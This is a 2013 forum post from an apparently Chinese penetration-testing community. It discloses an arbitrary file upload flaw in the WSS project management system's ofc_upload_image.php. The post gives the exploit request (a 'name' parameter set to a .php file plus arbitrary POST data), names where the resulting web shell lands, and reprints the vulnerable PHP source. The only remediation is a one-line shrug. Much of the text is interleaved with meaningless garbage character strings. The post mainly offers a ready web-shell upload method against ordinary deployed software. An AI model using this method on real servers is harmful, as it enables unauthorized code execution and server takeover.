中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]

---

作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
, ?% L. B2 _# Q
利用：
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

" r. ]! P/ W# }3 N( I  UPost任意数据
) S/ o# S  \& v( x保存位置http://localhost/chart/tmp-upload-images/hfy.php
7 \: Y! Q& F2 L/ ?# S4 n' k[attach]201[/attach]
[attach]202[/attach]
8 P8 S- W9 R0 ?: X4 m/ o. [最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

<?php
0 x1 m; r4 S3 J, f! f* E( p
/ S( W7 T: }) L# u3 d' ^//
$ H( R! J( a6 d" H6 ^- }, C5 [; O// In Open Flash Chart -> save_image debug mode, you
( Y6 p5 a5 @1 w! s// will see the 'echo' text in a new window.
//
$ x% @2 f# a$ `/ z, c6 A
6 _$ w. o7 y; V5 s# W' \1 _/*

, z5 e4 I8 _+ ?# c. Uprint_r( $_GET );
9 m$ j" {7 c2 R& |print_r( $_POST );
7 v- T$ g, m- p1 Dprint_r( $_FILES );
2 ?" B. @% S% V/ k
print_r( $GLOBALS );
" O/ [5 h5 `) D% _& A, q3 p" b3 {print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
( ^* O% u1 s6 x// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
, G# k( c2 i; h1 V3 W0 K2 b$destination = $default_path . basename( $_GET[ 'name' ] );
9 d( q5 R/ \$ @0 D& p8 W& `
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
7 @4 w( F4 Y! J8 y7 D. T. O; t( d; }
8 @# k, A2 @( W4 p8 }% E. \* n" ]//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
: u) d! R" N$ C  I8 B1 u3 i* s7 I//

  L3 h/ B' Y! D! w  H4 D$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
9 e" S# @* t9 m$ e2 ofclose($jfh);
) v6 F5 k) Z0 M8 t
' h) u" v& v5 W$ c. s0 @* Q//
// LOOK:
- j3 u7 C6 O* ^; V/ [6 o7 i- D8 T//
exit();
1 K5 x  i' N: {9 x//
$ a- O  n+ L" {. _- \5 p1 G+ W// PHP5:
//

9 v$ c" C3 A/ l. q0 z3 z6 Y1 d9 w
! {" o" a8 }8 Y! \// default path for the image to be stored //
8 C& B* M. S: t7 }$default_path = 'tmp-upload-images/';
: B0 ]7 ?. w8 N. Z
5 q  b. D% p5 B6 V% d3 U: Fif (!file_exists($default_path)) mkdir($default_path, 0777, true);

! L7 J: |9 K0 {6 M8 C// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

' b& \$ ^4 y9 H! s2 D// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
( W% C8 L: W% I9 y. T5 V' z    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
4 ^3 j2 n, V# |, S7 Y, e9 ^/ @} else {
6 }- n; \' s6 o, K3 |: v    echo "FILE UPLOAD FAILED";
5 h. a' P' Y* ]8 S- ^}
1 s: o0 {0 w" M% W
5 _0 l. V  `2 N8 E: M6 }
2 y5 ?/ y0 A/ r$ o% M?>


& B5 m+ n1 i# t) w& n
' K% o7 w2 c# T% g1 O5 K
8 F; K, ?$ L. s& B[attach]203[/attach]

修复方案：
这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞
4 h- K2 v, }) u, B, B
8 m2 C) }0 t3 Q! T, v

; L7 y4 K  H) p1 `

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2